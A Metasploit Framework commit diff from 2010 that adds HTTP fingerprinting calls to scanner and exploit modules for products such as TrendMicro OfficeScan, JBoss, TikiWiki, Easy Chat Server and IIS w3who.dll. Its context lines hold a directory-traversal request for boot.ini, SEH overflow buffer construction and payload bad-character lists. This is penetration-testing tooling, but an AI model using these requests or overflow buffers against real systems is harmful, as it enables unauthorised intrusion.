add http_fingerprint calls to modules that use various headers

git-svn-id: file:///home/svn/framework3/trunk@9627 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2010-06-25 20:53:12 +00:00
parent 2ab5983e2a
commit 12fbdcd878
16 changed files with 167 additions and 133 deletions

View File

@ -42,10 +42,13 @@ class Metasploit3 < Msf::Auxiliary
def run_host(ip)
begin
res = send_request_raw({
'method' => 'GET',
'uri' => '/',
}, 25)
res = send_request_raw(
{
'method' => 'GET',
'uri' => '/',
}, 25)
http_fingerprint({ :response => res })
if (res and res.code == 200)
@ -133,4 +136,3 @@ class Metasploit3 < Msf::Auxiliary
end
end
end

View File

@ -9,10 +9,8 @@
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
@ -23,7 +21,7 @@ class Metasploit3 < Msf::Auxiliary
'Name' => 'TrendMicro OfficeScanNT Listener Traversal Arbitrary File Access',
'Version' => '$Revision$',
'Description' => %q{
This module tests for directory traversal vulnerability in the UpdateAgent
This module tests for directory traversal vulnerability in the UpdateAgent
function in the OfficeScanNT Listener (TmListen.exe) service in Trend Micro
OfficeScan. This allows remote attackers to read arbitrary files as SYSTEM
via dot dot sequences in an HTTP request.
@ -40,17 +38,20 @@ class Metasploit3 < Msf::Auxiliary
)
register_options(
[
Opt::RPORT(26122),
], self.class)
[
Opt::RPORT(26122),
], self.class)
end
def run_host(target_host)
res = send_request_raw({
'uri' => '/activeupdate/../../../../../../../../../../../boot.ini',
'method' => 'GET',
}, 20)
res = send_request_raw(
{
'uri' => '/activeupdate/../../../../../../../../../../../boot.ini',
'method' => 'GET',
}, 20)
http_fingerprint({ :response => res })
if (res.code >= 200)
if (res.body =~ /boot/)

View File

@ -22,10 +22,14 @@ class Metasploit3 < Msf::Auxiliary
super(update_info(info,
'Name' => 'JBoss Vulnerability Scanner',
'Description' => %q{
This module scans a JBoss instance for vulnerablities.
This module scans a JBoss instance for a few vulnerablities.
},
'Version' => '$Revision$',
'Author' => [ 'Tyler Krpata' ],
'References' =>
[
[ 'CVE', '2010-0738' ] # VERB auth bypass
],
'License' => BSD_LICENSE
))
@ -39,14 +43,16 @@ class Metasploit3 < Msf::Auxiliary
def run_host(ip)
print_status("Processing IP #{ip}")
res = send_request_cgi({
'uri' => "/"+Rex::Text.rand_text_alpha(12),
'method' => 'GET',
'ctype' => 'text/plain',
}, 20)
if (xpb = res.headers['X-Powered-By'])
print_status("X-Powered-By: #{xpb}")
end
res = send_request_cgi(
{
'uri' => "/"+Rex::Text.rand_text_alpha(12),
'method' => 'GET',
'ctype' => 'text/plain',
}, 20)
info = http_fingerprint({ :response => res })
print_status(info)
if(res.body and />(JBoss[^<]+)/.match(res.body) )
print_status("JBoss error message: #{$1}")
end

View File

@ -67,12 +67,16 @@ class Metasploit3 < Msf::Auxiliary
get_source = Rex::Text.uri_encode("::$data")
begin
res = send_request_raw({
'method' => 'GET',
'uri' => "/#{uri}#{get_source}",
}, 25)
res = send_request_raw(
{
'method' => 'GET',
'uri' => "/#{uri}#{get_source}",
}, 25)
version = res.headers['Server'] if res
if res
version = res.headers['Server']
http_fingerprint({ :response => res })
end
if vuln_versions.include?(version)
print_good("#{target_url} - nginx - Vulnerable version: #{version}")

View File

@ -67,6 +67,7 @@ class Metasploit3 < Msf::Auxiliary
'uri' => "/manager/html",
'method' => 'GET'
}, 25)
http_fingerprint({ :response => res })
rescue ::Rex::ConnectionError => e
vprint_error("http://#{rhost}:#{rport}/manager/html - #{e}")
return

View File

@ -43,6 +43,8 @@ class Metasploit3 < Msf::Auxiliary
if res and res.code == 200
http_fingerprint({ :response => res })
tserver = res.headers['Server']
if (res.headers['DAV'] == '1, 2') and (res.headers['MS-Author-Via'].match('DAV'))
@ -54,12 +56,13 @@ class Metasploit3 < Msf::Auxiliary
print_status("#{target_host} (#{tserver}) has #{wdtype} ENABLED")
report_note(
:host => target_host,
:proto => 'HTTP',
:port => rport,
:type => wdtype,
:data => 'enabled'
)
{
:host => target_host,
:proto => 'HTTP',
:port => rport,
:type => wdtype,
:data => 'enabled'
})
else
print_status("#{target_host} (#{tserver}) WebDAV disabled.")

View File

@ -117,21 +117,20 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
res = send_request_raw(
{
'method' => 'OPTIONS',
'proto' => 'HTTP',
'version' => '1.0',
'uri' => datastore['PATH']
}, 5)
res = send_request_raw({
'method' => 'OPTIONS',
'proto' => 'HTTP',
'version' => '1.0',
'uri' => datastore['PATH']
}, 5)
if res and res['Server']
print_status("Found server: #{res['Server']}")
info = http_fingerprint({ :response => res })
if (info =~ /Sun/)
print_status("Found server: #{info}")
return Exploit::CheckCode::Detected
end
Exploit::CheckCode::Safe
end
def exploit

View File

@ -236,6 +236,8 @@ class Metasploit3 < Msf::Exploit::Remote
return Exploit::CheckCode::Safe
end
http_fingerprint({ :response => res })
if (res.code != 200)
print_status("The server returned #{res.code} #{res.message}")
return Exploit::CheckCode::Safe

View File

@ -32,15 +32,13 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'CVE', '2002-1643' ],
[ 'OSVDB', '4468'],
[ 'URL', 'http://lists.immunitysec.com/pipermail/dailydave/2003-August/000030.html'],
[ 'URL', 'http://lists.immunitysec.com/pipermail/dailydave/2003-August/000030.html']
],
'Privileged' => true,
'Payload' =>
{
'Space' => 2000,
'BadChars' => "\x00\x0a\x0d\x25\x2e\x2f\x5c\xff\x20\x3a\x26\x3f\x2e\x3d",
'BadChars' => "\x00\x0a\x0d\x25\x2e\x2f\x5c\xff\x20\x3a\x26\x3f\x2e\x3d"
},
'Targets' =>
[
@ -56,19 +54,20 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
res = send_request_raw({
'method' => 'OPTIONS',
'proto' => 'RTSP',
'version' => '1.0',
'uri' => '/'
}, 5)
res = send_request_raw(
{
'method' => 'OPTIONS',
'proto' => 'RTSP',
'version' => '1.0',
'uri' => '/'
}, 5)
info = http_fingerprint({ :response => res })
if res and res['Server']
print_status("Found RTSP: #{res['Server']}")
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
Exploit::CheckCode::Safe
end
def exploit

View File

@ -61,17 +61,20 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
res = send_request_raw({
'uri' => datastore['URI'] + "/tiki-index.php",
'method' => 'GET',
'headers' =>
res = send_request_raw(
{
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
'Connection' => 'Close',
}
}, 5)
'uri' => datastore['URI'] + "/tiki-index.php",
'method' => 'GET',
'headers' =>
{
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
'Connection' => 'Close',
}
}, 5)
if (res and res.message == "OK" and res.body.match(/TikiWiki v?([0-9\.]*)/))
http_fingerprint({ :response => res })
if (res and res.code == 200 and res.body.match(/TikiWiki v?([0-9\.]*)/))
ver = $1
#print_status("Detected TikiWiki version #{ver}")
ver = ver.split('.')
@ -89,8 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
Exploit::CheckCode::Safe
end
def exploit

View File

@ -62,21 +62,23 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
res = send_request_raw({
'uri' => datastore['URI'] + "/tiki-index.php",
'method' => 'GET',
'headers' =>
res = send_request_raw(
{
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
'Connection' => 'Close',
}
}, 25)
'uri' => datastore['URI'] + "/tiki-index.php",
'method' => 'GET',
'headers' =>
{
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
'Connection' => 'Close',
}
}, 25)
if (res and res.message == "OK" and res.body.match(/TikiWiki 1\.9\.4/))
http_fingerprint({ :response => res })
if (res and res.code == 200 and res.body.match(/TikiWiki 1\.9\.4/))
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
Exploit::CheckCode::Safe
end
def exploit

View File

@ -81,6 +81,8 @@ class Metasploit3 < Msf::Exploit::Remote
'uri' => '/SecurityGateway.dll'
}, 10)
http_fingerprint({ :response => res })
if (res and res.headers['Server'] =~ /SecurityGateway (1\..*)$/)
case $1
when /1\.0\.1/
@ -98,7 +100,6 @@ class Metasploit3 < Msf::Exploit::Remote
# handle auto-targeting
mytarget = target
if target.name =~ /Automatic/
mytarget = auto_target
if mytarget.nil?
raise RuntimeError, "Unable to automatically select a target"

View File

@ -161,6 +161,8 @@ class Metasploit3 < Msf::Exploit::Remote
def check
response = send_request_raw({'uri' => '/'}, 5)
http_fingerprint({ :response => response })
if response.nil?
print_status("No response to request")
return Exploit::CheckCode::Safe
@ -194,6 +196,9 @@ class Metasploit3 < Msf::Exploit::Remote
def auto_target
response = send_request_raw({'uri' => '/'}, 5)
http_fingerprint({ :response => response })
targets_to_try = []
if response.nil?

View File

@ -57,21 +57,28 @@ class Metasploit3 < Msf::Exploit::Remote
'DisclosureDate' => 'Aug 14 2007',
'DefaultTarget' => 0))
register_options([
register_options(
[
Opt::RPORT(80),
OptString.new('PATH', [ true, "Installation path of Easy Chat Server",
"C:\\Program Files\\Easy Chat Server" ])
], self.class )
end
def check
res = send_request_raw
def auto_target
info = http_fingerprint
t = nil
if (info =~ /Easy Chat Server\/1\.0/)
t = targets[0]
end
t
end
if res and res['Server'] =~ /Easy Chat Server\/1.0/
def check
if auto_target
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
Exploit::CheckCode::Safe
end
def exploit
@ -79,9 +86,10 @@ class Metasploit3 < Msf::Exploit::Remote
val = rand_text_alpha(rand(10) + 1)
num = rand_text_numeric(1)
# exploit buffer.
path = datastore['PATH'] + "\\users\\"
print_status("path: " + path)
# exploit buffer.
filler = rand_text_alpha(256 - path.length)
seh = generate_seh_payload(target.ret)
juju = filler + seh

View File

@ -51,15 +51,12 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
response = send_request_raw
info = http_fingerprint
if response and
response['Server'] and
response['Server'] =~ /.*MailEnable/
if (info =~ /.*MailEnable/)
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
Exploit::CheckCode::Safe
end
def exploit

View File

@ -9,10 +9,8 @@
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
@ -22,7 +20,7 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(info,
'Name' => 'Microsoft IIS ISAPI w3who.dll Query String Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the w3who.dll ISAPI
This module exploits a stack buffer overflow in the w3who.dll ISAPI
application. This vulnerability was discovered Nicolas
Gregoire and this code has been successfully tested against
Windows 2000 and Windows XP (SP2). When exploiting Windows
@ -35,11 +33,10 @@ class Metasploit3 < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2004-1134'],
[ 'OSVDB', '12258'],
[ 'URL', 'http://www.exaprobe.com/labs/advisories/esa-2004-1206.html'],
[ 'BID', '11820'],
[ 'CVE', '2004-1134' ],
[ 'OSVDB', '12258' ],
[ 'URL', 'http://www.exaprobe.com/labs/advisories/esa-2004-1206.html' ],
[ 'BID', '11820' ]
],
'Privileged' => false,
'DefaultOptions' =>
@ -64,44 +61,50 @@ class Metasploit3 < Msf::Exploit::Remote
'DefaultTarget' => 0,
'DisclosureDate' => 'Dec 6 2004'))
register_options(
[
OptString.new('URL', [ true, "The path to w3who.dll", "/scripts/w3who.dll" ]),
], self.class)
register_options(
[
OptString.new('URL', [ true, "The path to w3who.dll", "/scripts/w3who.dll" ]),
], self.class)
end
def auto_target
res = send_request_raw(
{
'uri' => datastore['URL']
}, -1)
http_fingerprint({ :response => res })
# Was a vulnerable system detected?
t = nil
if (res and res.body =~ /Access Token/)
case res.headers['Server']
when /5\.1/
t = targets[2]
else
t = targets[1]
end
end
t
end
def check
res = send_request_raw({
'uri' => datastore['URL']
}, -1)
if (res and res.body =~ /Access Token/)
if auto_target
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
Exploit::CheckCode::Safe
end
def exploit
mytarget = target
if (target.name =~ /Automatic/)
mytarget = auto_target
else
mytarget = target
end
if(mytarget.name =~ /Automatic/)
res = send_request_raw({
'uri' => datastore['URL']
}, -1)
# Was a vulnerable system detected?
if (res and res.body =~ /Access Token/)
case res.headers['Server']
when /5\.1/
mytarget = targets[2]
else
mytarget = targets[1]
end
else
print_error("No valid target found")
end
if not mytarget
raise RuntimeError, "No valid target found"
end
buf = rand_text_english(8192, payload_badchars)
@ -120,4 +123,3 @@ class Metasploit3 < Msf::Exploit::Remote
end
end